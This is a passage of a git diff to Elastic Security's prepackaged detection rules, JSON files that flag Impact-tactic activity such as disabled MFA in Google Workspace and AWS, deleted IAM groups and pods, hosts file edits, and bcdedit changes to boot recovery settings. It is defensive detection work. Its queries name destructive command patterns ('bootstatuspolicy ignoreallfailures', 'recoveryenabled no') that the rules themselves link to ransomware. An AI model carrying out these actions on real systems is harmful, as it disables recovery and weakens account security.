configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Google Workspace Admin Role Deletion", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:DELETE_ROLE\n", + "references": [ + "https://support.google.com/a/answer/2406043?hl=en" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93e63c3e-4154-4fc6-9f86-b411e0987bbf", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 14 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json new file mode 100644 index 0000000000000..03ba59c239969 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json @@ -0,0 +1,89 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when multi-factor authentication (MFA) enforcement is disabled for Google Workspace users. An adversary may disable MFA enforcement in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "MFA policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Google Workspace MFA Enforcement Disabled", + "note": "## Triage and analysis\n\n### Investigating Google Workspace MFA Enforcement Disabled\n\nMulti-factor authentication is a process in which users are prompted during the sign-in process for an additional form\nof identification, such as a code on their cellphone or a fingerprint scan.\n\nIf you only use a password to authenticate a user, it leaves an insecure vector for attack. If the password is weak or\nhas been exposed elsewhere, an attacker could be using it to gain access. When you require a second form of authentication,\nsecurity is increased because this additional factor isn't something that's easy for an attacker to obtain or duplicate.\n\nFor more information about using MFA in Google Workspace, access the [official documentation](https://support.google.com/a/answer/175197).\n\nThis rule identifies the disabling of MFA enforcement in Google Workspace. This modification weakens the security of\nthe accounts and can lead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate the multi-factor authentication enforcement.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin\n and event.category:iam and event.action:ENFORCE_STRONG_AUTHENTICATION\n and google_workspace.admin.new_value:false\n", + "references": [ + "https://support.google.com/a/answer/9176657?hl=en#" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.new_value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cad4500a-abd7-4ef3-b5d3-95524de7cfe1", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json index 790c4092ae58f..80f15f40cb8ab 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json @@ -13,13 +13,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Hosts File Modified", - "note": "## Config\n\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "any where\n\n /* file events for creation; file change events are not captured by some of the included sources for linux and so may\n miss this, which is the purpose of the process + command line args logic below */\n (\n event.category == \"file\" and event.type in (\"change\", \"creation\") and\n file.path : (\"/private/etc/hosts\", \"/etc/hosts\", \"?:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\")\n )\n or\n\n /* process events for change targeting linux only */\n (\n event.category == \"process\" and event.type in (\"start\") and\n process.name in (\"nano\", \"vim\", \"vi\", \"emacs\", \"echo\", \"sed\") and\n process.args : (\"/etc/hosts\")\n )\n", "references": [ "https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +86,5 @@ "timeline_title": "Comprehensive File Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json index cb4f1a15cd337..1bd09096e9ea2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json @@ -16,14 +16,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Deactivation of MFA Device", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Deactivation of MFA Device\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your\nuser name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for\ntheir user name and password (the first factor\u2014what they know), as well as for an authentication code from their AWS MFA\ndevice (the second factor\u2014what they have). Taken together, these multiple factors provide increased security for your\nAWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThis rule looks for the deactivation or deletion of AWS MFA devices. These modifications weaken account security and can\nlead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:(DeactivateMFADevice or DeleteVirtualMFADevice) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/deactivate-mfa-device.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeactivateMFADevice.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json index 9aea3879d2545..43a166753e44a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:DeleteGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/delete-group.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "867616ec-41e5-4edc-ada2-ab13ab45de8a", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json index 456eff557ccf1..c4fc874000749 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Pods Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "83a1931d-8136-46fc-b7b9-2db4f639e014", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json index 14a2f6ddeb095..67ccd0a7bc413 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Potential ransomware activity", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json index 1534e4ba9f75c..5bc49a76045f0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Unusual Volume of File Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json index 16ee71a7dc17f..b7384909cf0a9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of Boot Configuration", - "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options.\nThese are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to\nconfigure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. Administrators can modify these configurations to force a\nmachine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options.\nThese are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to\nconfigure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. Administrators can modify these configurations to force a\nmachine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json index 2c3512fb2ad77..866cc46f5160a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Deactivate an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:application.lifecycle.deactivate\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Apps/Apps_Apps.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,9 +48,27 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json similarity index 56% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json index 4f18d2496e874..236fdc6a824f4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Delete an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": 